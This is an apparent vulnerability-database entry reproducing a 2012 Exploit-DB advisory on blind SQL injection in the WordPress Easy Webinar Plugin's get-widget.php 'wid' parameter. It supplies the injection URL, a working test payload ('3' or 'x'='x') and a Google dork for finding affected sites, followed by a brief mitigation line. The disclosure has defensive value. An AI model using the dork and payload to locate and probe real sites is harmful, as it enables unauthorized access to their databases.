Wordpress Easy Webinar Plugin Blind SQL Injection Vulnerability

vendor:

Wordpress Easy Webinar Plugin

by:

Robert Cooper

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Wordpress Easy Webinar Plugin

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux/Windows 7

2012

WordPress Easy Webinar Plugin Blind SQL Injection Vulnerability

The Wordpress Easy Webinar Plugin is vulnerable to Blind SQL Injection. An attacker can exploit this vulnerability by sending a malicious SQL query to the vulnerable parameter 'wid' in the 'get-widget.php' file. The HTTP response will read 404, but this is false. An example of a malicious SQL query is '3' or 'x'='x', which will result in the page loading correctly and show that the plugin is vulnerable to injection (string).

Mitigation:

Developers should ensure that user-supplied input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

# Exploit Title: Wordpress Easy Webinar Plugin Blind SQL Injection Vulnerability

# Vendor Homepage: www.easywebinarplugin.com

# Date: 10/26/2012

# Author: Robert Cooper (robert.cooper [at] areyousecure.net)

# Tested on: [Linux/Windows 7]

#Vulnerable Parameters: wid=


# Google Dork: allinurl: get-widget.php?wid=

##############################################################
Exploit:

www.example.com/wp-content/plugins/webinar_plugin/get-widget.php?wid=[SQLi]

Note: The HTTP response will read 404, but this is false:

www.example.com/wp-content/plugins/webinar_plugin/get-widget.php?wid=3' or 'x'='x

This will result in the page loading correctly and show that the plugin is vulnerable to injection (string).
##############################################################

www.areyousecure.net

# Shouts to the Belegit crew